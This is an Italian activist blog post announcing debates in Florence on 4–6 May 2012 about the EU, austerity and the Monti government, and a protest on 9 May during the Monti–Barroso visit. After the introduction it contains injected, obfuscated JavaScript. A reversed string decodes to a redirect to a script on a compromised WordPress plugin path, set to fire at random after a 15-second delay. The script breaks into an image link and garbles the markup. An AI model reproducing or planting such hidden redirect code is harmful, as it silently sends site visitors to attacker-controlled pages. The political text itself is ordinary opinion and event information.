Monti, Barroso e le grandi truffe economiche: a Firenze dal 4 al 6 maggio. E il 9 manifestazione

image_pdfimage_print

Riceviamo da Agorà Fiorentina e volentieri pubblichiamo. Approfittiamo di questo articolo per dare notizia che il 9 maggio, in concomitanza con la visita di Mario Monti e del presidente della Commissione Europea José Manuel Barroso a Firenze, i movimenti fiorentini hanno organizzato una manifestazione di protesta con ritrovo alle ore 17.30 in Piazza Unità d’Italia (SMN).

***
$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2012/05/agora-fiorentina-1.jpg”>Ti senti fregato dal governo tecnico e dall’Europa che ti chiede continui sacrifici? Fai bene.

Il 9 e il 10 maggio l’istituto universitario europeo, che ha sede a Fiesole, organizza a Palazzo Vecchio una conferenza intitolata “lo stato dell’Unione: edizione 2012” (The state of the Union), per analizzare e dibattere la situazione atttuale dell’Unione Europea. Interverranno policy-makers (politici, ormai ridotti a meri esecutori), leading accademics (accademici al comando, quelli che noi in Italia chiamiamo baroni) e opinion leaders (quelli che decidono cosa deve pensare la gente). Fra questi ci saranno anche José Manuel Barroso, presidente della Commissione Europea, e Mario Monti, nostro attuale primo ministro.

“E noi?”, dirà qualcuno. Ancora una volta non veniamo chiamati in causa, e subiamo le conseguenze delle decisioni di questi signori. L’Europa unita, il sogno delle generazioni che hanno visto la guerra, si è trasformato in un incubo. Il vero volto dell’Unione Europea si sta mostrando nelle politiche di austerity imposte dai poteri forti. Tramite il ricatto del pagamento del debito, è in atto un vero e proprio saccheggio ai danni dei cittadini europei, che mostra ogni giorno i suoi frutti. I governi dei paesi che non tengono il passo vengono rimpiazzati da uomini di fiducia, non eletti democraticamente: Papademos in Grecia, Monti in Italia.

Tutti sanno qual è la situazione della Grecia. In proposito il nostro presidente del consiglio ha dichiarato, in nome della stabilità della penisola ellenica: “qual è la più grande manifestazione concreta del successo dell’euro? La Grecia!”

Non facciamoci truffare da questa gente.

Dal 4 al 6 di Maggio ci incontreremo in diversi luoghi del centro cittadino per discutere delle grandi truffe ai nostri danni. Gli interventi iniziali serviranno a fornire strumenti per la discussione. Interverranno anche comitati ed esperienze di lotta sul territorio.

Invitiamo a partecipare tutti i cittadini stanchi di essere sudditi.

Riprendiamoci i nostri spazi di dibattito e di organizzazione

Venerdi 4 maggio, ore 18.00, facoltà di Lettere e Filosofia, piazza Brunelleschi 4

LA CRISI E LA TRUFFA DELL’EUROPA:
interventi introduttivi di Silvano Cacciari e Danilo Corradi

Sabato 5 maggio, ore 11.00, facoltà di Scienze della Formazione, via Laura 48

LA TRUFFA DELLE GRANDI OPERE:
interverranno attivisti No Tav della val di Susa, il Comitato No tunnel Tav di Firenze e le Brigate di Solidarietà Attiva che parleranno della loro esperienza a l’Aquila

Domenica 6 maggio, ore 15.00, largo Pietro Annigoni, presso piazza Ghiberti

LA TRUFFA DELLA GREEN ECONOMY:
interverranno Angelo Baracca, membri del coordinamento comitati ATO Toscana centro, del comitato ambiente Amiata, del No Inc di Albano (Roma) e dei comitati contro gli inceneritori della piana

ore 17.00
LA TRUFFA DELLA DEMOCRAZIA:
interverranno membri dei comitati per l’Acqua bene comune e del movimento lotta per la casa di Firenze

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *